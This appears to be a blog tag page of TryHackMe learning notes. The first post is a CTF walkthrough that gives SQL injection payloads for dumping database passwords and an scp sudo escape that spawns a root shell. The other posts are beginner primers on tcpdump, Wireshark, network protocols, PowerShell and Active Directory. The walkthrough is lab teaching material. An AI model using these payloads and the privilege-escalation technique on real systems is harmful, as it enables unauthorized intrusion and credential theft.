Skip to main content

7 posts tagged with "tryhackme"

View All Tags

Jurassic Park → TryHackMe

Shubham
Cybersecurity Enthusiast

Jurassic Park TryHackMe

login : ssh dennis@<TARGET_IP>
password : (Obtained via SQL Injection in the web application)

Task

The objective is to find multiple flags scattered across the machine by exploiting a vulnerable web application to gain a foothold, and subsequently abusing sudo privileges to escalate to root.

Quick theory

When a web application takes user input and passes it directly into a database query without sanitization, it becomes vulnerable to SQL Injection (SQLi). You can use UNION based SQLi to append your own queries and dump database credentials.

Once inside a system, privilege escalation can often be achieved by checking what commands the current user can run as root using sudo -l. If a permitted binary has known bypasses, tools like GTFOBins provide command snippets to exploit them and spawn a root shell.

Tools you’ll use:
Burp Suite -> to capture, modify, and fuzz HTTP requests (Intruder/Repeater).
SQLi (Manual) -> to enumerate database columns, tables, and dump passwords.
scp (via GTFOBins) -> to escalate privileges to root.

Solution

# 1. After an Nmap scan reveals port 80 and 22, visit the web app.
# The 'id' parameter in the shop package URL is vulnerable to SQLi.
# Determine the number of columns (fails at 6, meaning there are 5 columns):
?id=1+ORDER+BY+6
# 2. Extract database tables and column names:
?id=1+UNION+SELECT+1,table_name,3,4,5+FROM+information_schema.tables+WHERE+table_schema=database()
?id=1+UNION+SELECT+1,column_name,3,4,5+FROM+information_schema.columns+WHERE+table_name="users"+AND+table_schema=database()
# 3. Dump the password from the users table:
?id=1+UNION+SELECT+1,password,3,password,5+FROM+users
# 4. Use Burp Intruder to fuzz the 'id' parameter from 0-50 to find the valid user "dennis".
# Log in via SSH using the dumped credentials:
neocipher27@fedora:~$ ssh dennis@<TARGET_IP>
# Capture the first flag in the user's directory.
# 5. Check bash history for the third flag and hints for the fifth flag:
dennis@jurassic:~$ cat .bash_history
# OR
dennis@jurassic:~$ history
# 6. Check for sudo privileges to escalate to root:
dennis@jurassic:~$ sudo -l
# Output shows 'scp' can be run as root without a password.
# 7. Exploit scp using GTFOBins to spawn a root shell:
dennis@jurassic:~$ TF=$(mktemp)
dennis@jurassic:~$ echo 'sh 0<&2 1>&2' > $TF
dennis@jurassic:~$ chmod +x "$TF"
dennis@jurassic:~$ sudo scp -S $TF x y:
# 8. Capture the fifth flag in the root directory:
root@jurassic:~# cat /root/flag5.txt
# 9. Find the remaining flags (flag 2 is inside the ubuntu user's bash history):
root@jurassic:~# cat /home/ubuntu/.bash_history

Tcpdump: The Basics

Shubham
Cybersecurity Enthusiast

What is Tcpdump

okay let me go through it straightforward

tcpdump is a command-line packet analyzer. it captures packets directly from a network interface or reads them from a saved pcap file, then prints packet details.

lame language definition:
tcpdump is like a tiny network spy that listens to all traffic on an interface

formal definition:
tcpdump is a libpcap-based command-line tool that intercepts, filters, and displays packets for diagnostics, forensics, and network monitoring purposes.


Why Tcpdump Matters

  • runs on servers without GUI
  • extremely lightweight, ideal for quick captures
  • can save captures to .pcap and analyze later in Wireshark
  • useful for debugging network connectivity
  • helps detect suspicious/malicious traffic
  • allows automated/scripted packet captures

lame language definition:
when something weird happens on your network, tcpdump shows what’s actually flowing over the wire

formal definition:
tcpdump provides packet-level visibility for troubleshooting, auditing, and security monitoring by capturing and filtering traffic directly from network interfaces.


Basic Usage & Important Options

common options you’ll use:

  • **-i <interface>** → choose interface (eth0, wlan0, lo, any)
  • **-n / -nn** → show numeric IPs/ports (no DNS or service-name resolution)
  • **-c <count>** → stop after N packets
  • **-w <file>** → write packets to a pcap for later analysis
  • **-r <file>** → read a saved pcap file

general syntax:
tcpdump [options] [filter expression]


Filtering Packets

tcpdump filters are extremely powerful and help cut noise.

examples:

  • capture only ICMP
    icmp

  • capture HTTP port 80
    port 80

  • capture packets from a specific IP
    src 192.168.1.10

  • capture packets to a specific IP
    dst 10.0.0.5

  • combine filters
    tcp and port 443 and src 10.10.10.50

filters let you focus on exactly what matters.


Reading vs Capturing

tcpdump can:

  • capture live packets
  • save packets to a file
  • read files created earlier
  • monitor remote servers via SSH
  • create captures you later open in Wireshark

this makes it versatile for both live debugging and offline analysis.


What Tcpdump Output Usually Looks Like

each printed line typically includes:

  • timestamp
  • protocol (IP, TCP, UDP, ICMP)
  • src_ip:src_port → dst_ip:dst_port
  • tcp flags (if applicable)
  • packet length or other metadata

this gives quick insight into what traffic is flowing without needing a full GUI analyzer.


When to Use Tcpdump vs Wireshark

use tcpdump when you need:

  • fast text-based packet capture
  • minimal system footprint
  • SSH-based remote analysis
  • automated or scripted packet recording
  • only basic header/payload visibility

use wireshark when you need UI-level detail, protocol trees, reassembly, or file extraction.


Security Use Cases

  • capture suspicious outbound connections
  • inspect DNS or ARP traffic during enumeration
  • detect plaintext credentials in unencrypted protocols
  • gather evidence during incident response
  • perform reconnaissance on unknown networks
  • analyze malware communications on isolated machines

tcpdump is extremely useful in cybersecurity because it provides raw, unfiltered network truth.


Conclusion

tcpdump is simple, powerful, and essential.
it lets you capture, filter, analyze, and save network packets — even on systems with no graphical environment.

if you understand tcpdump basics, filters, interface selection, and capture options,
you already have one of the strongest command-line packet analysis tools in your toolkit.

`

Wireshark Basics & Packet Analysis

Shubham
Cybersecurity Enthusiast

What is Wireshark

okay let me go through it straight forward

wireshark is a free and open-source packet analyzer used to capture and inspect network traffic. you can either sniff live packets or load pcap files for analysis.

lame language definition:
wireshark is basically a microscope for network traffic — you can zoom into every packet and see all details

formal definition:
wireshark is a cross-platform network protocol analyzer that captures, decodes, and displays packets across OSI layers, enabling low-level inspection, filtering, and traffic analysis.


Why Wireshark Matters

  • troubleshoot network issues
  • inspect protocol behavior (dns, http, tcp, udp, tls, etc.)
  • analyze suspicious or malicious traffic
  • understand real packet structures
  • extract files or data from captures
  • essential tool for both networking and cybersecurity

lame language definition:
if you want to see exactly what your computer is “saying”, wireshark is the tool

formal definition:
wireshark provides detailed packet-level visibility for diagnostics, protocol research, security auditing, and digital forensics.


Basic Wireshark Interface

when you open a capture, you mainly work with:

  • packet list pane → shows all packets
  • packet details pane → shows protocol breakdown for selected packet
  • packet bytes pane → raw hex/ASCII data
  • display filter bar → to narrow down what you want to see

you can load .pcap or .pcapng files or capture live traffic.


Packet Dissection

every packet is shown layer by layer:

  • ethernet (source/dest MAC)
  • ip header (source/dest IP, TTL, protocol)
  • tcp/udp (ports, flags, seq numbers)
  • application data (http, dns, ftp, tls, etc.)

the details pane lets you drill down into any header field.

example things you might inspect:

  • TTL value
  • source/destination ports
  • HTTP host or user-agent
  • DNS query name
  • TCP handshake flags
  • payload bytes

Filtering Packets

wireshark supports two kinds of filters:

capture filters

applied before capturing, restrict what gets recorded.
example: only capture traffic on port 80 → tcp port 80

display filters

applied to shown packets after loading a capture.
these are more powerful and commonly used.

examples:
dns
http
tcp.flags.syn == 1
ip.addr == 192.168.1.10
udp.port == 53

you can also right-click any field → “Apply as Filter” to generate syntax automatically.


Searching Inside Packets

you can search for:

  • strings inside packet bytes
  • hostnames
  • ip addresses
  • http headers
  • filenames
  • hidden text in payload

useful for CTFs and malware pcaps.


Statistics Tools

wireshark provides high-level summaries:

protocol hierarchy

breakdown of all protocols in the capture → useful for spotting dominant traffic

endpoints

shows all communicating IPs, MACs, ports

conversations

shows who talked to whom and how much data was exchanged

capture file properties

metadata about the pcap, sometimes includes hidden notes or flags

these tools let you get insights without reading every packet manually.


Common Use Cases

identifying suspicious traffic

filter by http, dns, unknown ports, large payloads, repeated requests, etc.

extracting files

some http/ftp/unencrypted streams let you reconstruct transmitted files.

analyzing tcp handshakes

useful for diagnosing connectivity issues.

spotting DNS exfiltration

check unusually long TXT records or frequent DNS queries.

reading HTTP requests

see urls, methods, cookies, headers (if unencrypted).

following a TCP stream

reconstruct entire conversations (http pages, ftp sessions, etc.)


Conclusion

wireshark is one of the most important tools for anyone learning networking or cybersecurity.
it shows you real traffic, real protocols, and real packet structures — no abstractions.

if you understand how to filter, dissect, and interpret packets in wireshark,
you basically understand how data truly moves across networks.

`

Networking Core Protocols

Shubham
Cybersecurity Enthusiast

Introduction

okay let me go through it straight forward

this room covers the core application-layer protocols the internet uses everyday: DNS, WHOIS, HTTP, FTP, SMTP/POP3/IMAP.
these protocols help resolve names, fetch web pages, transfer files, and send/receive emails.

lame language definition:
these are the official "languages" computers speak for websites, files, emails, and domain lookup

formal definition:
Core network protocols are standardized application-layer communication rules that define how data is requested, transferred, and interpreted across the internet, enabling services like DNS resolution, HTTP browsing, FTP file transfer, and email transmission.


DNS (Domain Name System)

dns converts names → ip addresses.
your browser can't understand domain names, only numbers.

lame language definition:
dns is the internet’s phonebook

formal definition:
DNS is a hierarchical, distributed naming system that resolves human-readable domain names into IP addresses and provides additional record types like MX, CNAME, PTR, etc.

DNS Example

nslookup example.com
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: example.com
Address: 93.184.216.34

browser now knows where to send HTTP request.


WHOIS

whois gives info about who owns a domain, when it was registered, etc.

lame language definition:
whois is “who owns this address on the internet?”

formal definition:
WHOIS is a query/response protocol used to look up registration data for domain names and IP address blocks.

WHOIS Example

whois example.com
Domain Name: EXAMPLE.COM
Creation Date: 1995-08-13
Registrar: ...
Registrant Organization: IANA

used in reconnaissance.


HTTP (Hypertext Transfer Protocol)

http is how browsers fetch web pages, APIs, json, images, etc.

lame language definition:
http is “give me this webpage”

formal definition:
HTTP is an application-layer protocol defining how clients and servers request and deliver web resources, using methods like GET, POST, PUT, DELETE, etc.

HTTP Example

GET / HTTP/1.1
Host: example.com
User-Agent: curl/7.79.1
Accept: /

HTTP/1.1 200 OK
Content-Type: text/html
<html>...</html> ```
FTP (File Transfer Protocol)

ftp is used to upload/download files between client and server.

lame language definition: ftp is a courier service for files.

formal definition: FTP is a standard network protocol for transferring files over a reliable TCP connection, usually using port 21 for control and additional ports for data.

FTP Example

ftp example.com
Name: anonymous
Password: guest

ftp> ls
ftp> get secrets.txt
ftp> bye

Email Protocols (SMTP, POP3, IMAP)

SMTP

used for sending emails.

lame language definition: smtp sends your mail to the post office.

formal definition: SMTP is a protocol for transferring outgoing email between clients and mail servers, and between mail servers.

POP3

used for retrieving emails, usually downloads + deletes.

lame language definition: pop3 pulls emails down to your device.

formal definition: POP3 is a simple email retrieval protocol where the client downloads messages from server and optionally deletes them from the mailbox.

IMAP

used for retrieving emails but keeps them synced across devices.

lame language definition: imap keeps your emails on the server so all devices see same inbox.

formal definition: IMAP is an email protocol allowing clients to view, organize, and synchronize mail stored on the server without deleting it.

Email Example (POP3 via telnet)

telnet mail.example.com 110
+OK POP3 server ready
USER student
+OK
PASS password123
+OK Logged in
LIST
+OK 2 messages
RETR 1
Subject: Welcome
From: admin@example.com
QUIT

Why These Protocols Matter

dns → resolves names
whois → reveals domain ownership
http → loads websites
ftp → transfers files
smtp/pop/imap → email communication

lame language definition: without these, the internet would be a pile of raw IP addresses and bytes

formal definition: Core protocols make internet services usable by providing standardized mechanisms for name resolution, content delivery, file transfer, and email exchange. Conclusion

networking core protocols explain how websites load, how domains resolve, how files are transferred, and how emails flow across servers.

if you understand dns, whois, http, ftp, smtp/pop3/imap — you understand how humans communicate over the internet at protocol-level.

`

Networking Concepts

Shubham
Cybersecurity Enthusiast

OSI Model

okay let me go through it straight forward

so networking has this 7 layer model called OSI model
it’s basically a structured way to understand “how data moves” from your device to another device

lame language definition:
it is a 7-step pipeline through which data passes. each layer has a job, adds some info, and sends it to the next one

formal definition:
the OSI model (Open Systems Interconnection) standardizes communication functions into 7 abstraction layers to ensure different systems can communicate reliably

the 7 layers (in simple and useful language)

Layer 7 — Application
the apps you actually use (browser, ssh, discord)

Layer 6 — Presentation
formats and translates data (encryption, compression, encoding)

Layer 5 — Session
creates and maintains the connection (opening, closing, maintaining sessions)

Layer 4 — Transport
splits data into segments, handles ports, and ensures delivery (tcp/udp)

Layer 3 — Network
handles IP addresses and routing (deciding the best path)

Layer 2 — Data Link
mac addressing, local network delivery, error detection

Layer 1 — Physical
actual electrical/optical signals, cables, wifi waves

basically:
7 → what users see
1 → how bits physically travel


TCP/IP Model

it’s like OSI but the one that the internet actually uses.
more practical, fewer layers.

lame language definition:
TCP/IP is OSI model but compressed into 4 layers so engineers don’t cry

formal definition:
TCP/IP (Transmission Control Protocol / Internet Protocol) is a suite of communication protocols used to interconnect network devices on the internet

layers

Application Layer
combines OSI’s layers 5,6,7
your apps, formats, protocols like http, dns, ftp

Transport Layer
manages port numbers + segmentation + reliability
(TCP/UDP live here)

Internet Layer
IP addressing + routing

Network Access Layer
equals OSI layer 1+2
MAC, frames, physical transmission


IP Addresses & Subnets

ip = internet address of a device
A.B.C.D basically

now every IP address has two parts:

Network part → which network you belong to
Host part → your unique device inside that network

so how do we know which part is which?
using subnet mask

lame language definition:
subnet mask draws a line between “network” and “host” portion of the IP address

formal definition:
a subnet mask is a 32-bit number that divides an IP address into network and host identifiers

example:
255.255.255.0 → first 3 octets = network, last = host

so valid hosts become .1 to .254


TCP and UDP

TCP

the reliable guy
does handshake, ensures packet delivery, checks order
it’s slow but trustworthy

use cases: https, ssh, ftp, email

UDP

the fast guy
no handshake, no guarantee, no ordering
works when speed matters

use cases: video calls, gaming, streaming

lame language definition:
TCP cares, UDP doesn’t


Encapsulation

when data moves through layers, each layer wraps it with its own piece of information
like putting a gift into multiple wrapping papers

formal definition:
encapsulation is the process where each networking layer adds its own header (and sometimes trailer) to the data from the layer above

example flow:
application data → transport segment → IP packet → frame → bits

receiver does the reverse (decapsulation)


Telnet

telnet is an old protocol to remotely access systems

lame language definition:
it is SSH but without encryption … like shouting your password in public

formal definition:
telnet is an application protocol used to provide a bidirectional text-based communication using a virtual terminal connection over TCP (typically port 23)

not used anymore because everything is plaintext, so attackers can sniff credentials easily


Conclusion

all networking concepts here boil down to one idea:

data doesn’t just travel; it passes through layers, gets wrapped with info, uses protocols to move, and gets delivered safely using IP + TCP/UDP.

this is the backbone of how the internet works. `

Windows PowerShell

Shubham
Cybersecurity Enthusiast

Introduction

okay let me go through it straight forward

PowerShell is basically Windows' upgraded command-line.
it replaces old cmd with something way more powerful because it works with objects instead of plain text.

lame language definition:
it's cmd but on steroids — lets you automate, manage system stuff, and chain commands easily

formal definition:
PowerShell is a task-based command-line shell and scripting language built on .NET, designed for system automation and configuration management.


Cmdlets (Commands)

PowerShell doesn't use traditional commands like ls, cat, etc.
it uses cmdlets which follow the pattern:
Verb-Noun

lame language definition:
cmdlets are special built-in functions that perform small, focused actions

formal definition:
cmdlets are lightweight .NET-based commands used within PowerShell for performing administrative tasks.

some basic cmdlets:

Get-Command
lists all available commands

Get-Help
shows documentation for any cmdlet

Get-Alias
shows shortcut names for commands

these three are your starting trio.


just like linux, you move around directories and view things.
but names are different in powershell.

Set-Location → change directory
Get-ChildItem → list files/folders
New-Item → create a file/folder
Remove-Item → delete things
Copy-Item / Move-Item → copy / move files

lame language definition:
same file operations as linux/mac, only the cmd names are different

formal definition:
PowerShell uses provider-based access to systems like filesystem, registry, etc., allowing cmdlets to interact with them as structured objects.


Piping & Filtering (MOST important)

this is where powershell becomes overpowered compared to cmd.

you pass objects, not text.
this means downstream commands can read properties directly.

example concepts:

Where-Object → filter
Select-Object → pick properties
Sort-Object → sort results

lame language definition:
you're not messing with strings. you're passing real data with fields like Name, Id, Path, etc.

formal definition:
PowerShell pipelines transfer .NET objects between cmdlets, enabling structured querying, transformation, and automation.


Managing Processes & Services

PowerShell is a system admin tool at heart.
so it gives full access to OS-level components:

Get-Process → list running processes
Stop-Process → kill a process
Get-Service → list services
Start-Service / Stop-Service → control services

lame language definition:
you can inspect or control what is running on the machine using simple commands

formal definition:
PowerShell exposes OS process and service management through object-based cmdlets, allowing precise control and automation.


System & Network Information

powershell can show system details cleanly:

  • network config
  • environment variables
  • event logs
  • hardware info
  • registry

some common areas:

Get-NetIPConfiguration
Test-Connection (like ping but object-based)
Get-EventLog


Why PowerShell is Important in Cybersecurity

attackers love powershell
admins love powershell
everyone basically uses it

because:

  • it’s preinstalled on all windows systems
  • lets you automate enumeration
  • can access registry, services, files, processes
  • can download payloads, run scripts, and move laterally
  • allows powerful recon without extra tools

lame language definition:
if you know powershell, you can control a windows machine like a pro

formal definition:
PowerShell is widely adopted in offensive and defensive security due to its deep system access, scripting capabilities, and ubiquity across Windows environments.


Conclusion

all powershell concepts boil down to this:

instead of text, you're working with objects — which makes system automation, enumeration, and control extremely powerful.

if you understand cmdlets, pipelines, filtering, and basic system commands,
you already understand the core of PowerShell.

`

Windows and Active Directory Fundamentals

Shubham
Cybersecurity Enthusiast

Windows Architecture

okay let me go through it straight forward

windows internally is divided into system components like kernel, services, processes, registry, users, permissions etc.
understanding these is important because almost all attacks or security issues come from misconfigured services, weak permissions, or exposed shares.

lame language definition:
windows is layers of background programs + settings + user accounts working together

formal definition:
Windows OS is a multitasking operating system built on the NT architecture, consisting of the kernel, system services, user mode processes, the registry database, and a security subsystem enforcing authentication and authorization.


Users, Groups & Permissions

windows security fundamentally relies on accounts and groups.

your machine has:

  • local accounts → users on the device
  • groups → collections of users (Admin, Users, Guests etc.)
  • privileges → what they can or cannot do

lame language definition:
groups decide your power level in the system

formal definition:
Windows uses discretionary access control (DAC) where access tokens containing SIDs (security identifiers) determine permissions on resources.

important ones:

Administrators → full control
Users → standard, limited
SYSTEM → highest privilege (more than admin)


File System & NTFS Permissions

NTFS is the default file system.
it supports ACLs (access control lists) — which define exactly who can read, write, execute something.

permissions include:

  • FullControl
  • Modify
  • ReadExecute
  • Write
  • Read

lame language definition:
every file/folder has a list of “allowed people” and “what they can do”

formal definition:
NTFS implements per-object discretionary access control using ACEs linked to user or group SIDs, enabling granular file system security.


The Registry

registry = the huge configuration database for windows.
everything from installed programs to startup items to system policies lives here.

important hives:

  • HKEY_LOCAL_MACHINE (HKLM) → system-wide settings
  • HKEY_CURRENT_USER (HKCU) → settings for the logged-in user

lame language definition:
registry is windows’ brain storing all configuration

formal definition:
the Windows Registry is a hierarchical database storing system, user, and application configuration accessed via registry APIs.

attackers often abuse registry for persistence.


Windows Services & Processes

services = background programs
processes = running programs

you’ll often check them during enumeration.

useful concepts:

  • services can run as SYSTEM
  • misconfigured services can be escalated
  • startup type: auto, manual, disabled
  • process tree shows parent-child relationships

lame language definition:
services are programs that run even when no one is logged in

formal definition:
Windows services are long-running executables managed by the Service Control Manager (SCM), often running with elevated privileges.


Event Viewer (Logs)

windows logs everything meaningful: logons, errors, privilege changes, network events, etc.
important logs for security:

  • Security
  • System
  • Application

lame language definition:
event viewer is where you spy on what happened on the system

formal definition:
event logs are structured records generated by system components, applications, and security subsystems stored using the Windows Event Log API.


Networking (Windows Context)

important tools:

  • ipconfig → interface info
  • netstat → active connections
  • net commands → users, shares, groups
  • ping, tracert, nslookup → basic diagnostics

common enum areas:

  • open shares
  • firewall rules
  • RDP status
  • running services over ports

Windows Shares (SMB)

SMB allows sharing folders/printers across network.
enumeration often reveals misconfigured shares.

share types:

  • C$, ADMIN$, IPC$ → administrative
  • custom shares → may expose sensitive files

lame language definition:
SMB is like “network folders” that anyone on LAN can access if allowed

formal definition:
Server Message Block (SMB) is a network file-sharing protocol enabling access to files and services over TCP/IP.


PowerShell (Quick Summary)

PowerShell is the backbone of Windows automation and recon.

important ideas:

  • everything is an object
  • pipelines pass objects
  • cmdlets follow Verb-Noun pattern
  • easy access to registry, services, WMI, CIM, processes

you've already covered this in detail in the previous writeup.


Active Directory (AD)

What is Active Directory

AD is basically identity + permission management for large networks (like companies) using Windows machines.

lame language definition:
AD is a system that controls “who you are” and “what you can do” inside a company network

formal definition:
Active Directory is a directory service built on LDAP and Kerberos, providing centralized authentication, authorization, and policy management within Windows domains.


Domain, OU, Users, Groups

in AD, machines and users belong to a domain (example: corp.local).

objects inside AD are organized into:

  • Users
  • Groups
  • Computers
  • Organizational Units (OUs)

lame language definition:
domain = company network
OU = folders to organize users/computers

formal definition:
OUs are containers in AD enabling hierarchical organization and targeted Group Policy application.


Domain Controllers (DC)

domain controller = server that runs AD services.

it handles:

  • login authentication (Kerberos)
  • directory lookups (LDAP)
  • group policies

lame language definition:
DC is the boss server that decides if you can log in or not

formal definition:
a Domain Controller is a Windows server hosting AD DS, responsible for authentication, authorization, and domain policy enforcement.


Kerberos (Authentication)

Kerberos is default authentication in AD.

flow (very simplified):

  1. user requests a TGT
  2. DC verifies identity
  3. DC issues a TGT
  4. user uses TGT to access services

lame language definition:
kerberos gives you a “ticket” proving who you are

formal definition:
Kerberos is a network authentication protocol using symmetric cryptography and ticket-based identity validation.


Group Policy (GPO)

GPOs apply settings to many users/computers at once:

  • password policies
  • software restrictions
  • login scripts
  • firewall rules
  • drive mappings

lame language definition:
admins use GPOs so they don’t have to configure 500 computers manually

formal definition:
Group Policy is a centralized configuration management feature applying domain-level policies via AD.


AD Enumeration (Security Context)

attackers and defenders both enumerate AD for:

  • user lists
  • group memberships
  • misconfigured permissions
  • service accounts
  • SPNs (for kerberoasting)
  • unconstrained delegation
  • password policy weaknesses

tools commonly used:

  • net commands
  • PowerShell (Get-ADUser, Get-ADComputer, Get-ADGroup)
  • bloodhound / sharphound

Conclusion

windows fundamentals + active directory fundamentals combine into one big idea:

windows controls security using accounts, permissions, groups, services, registry, and processes — and AD extends this model to whole networks using domains, policies, and centralized authentication.

understanding these core systems is enough to navigate almost any Windows/AD cybersecurity task.

`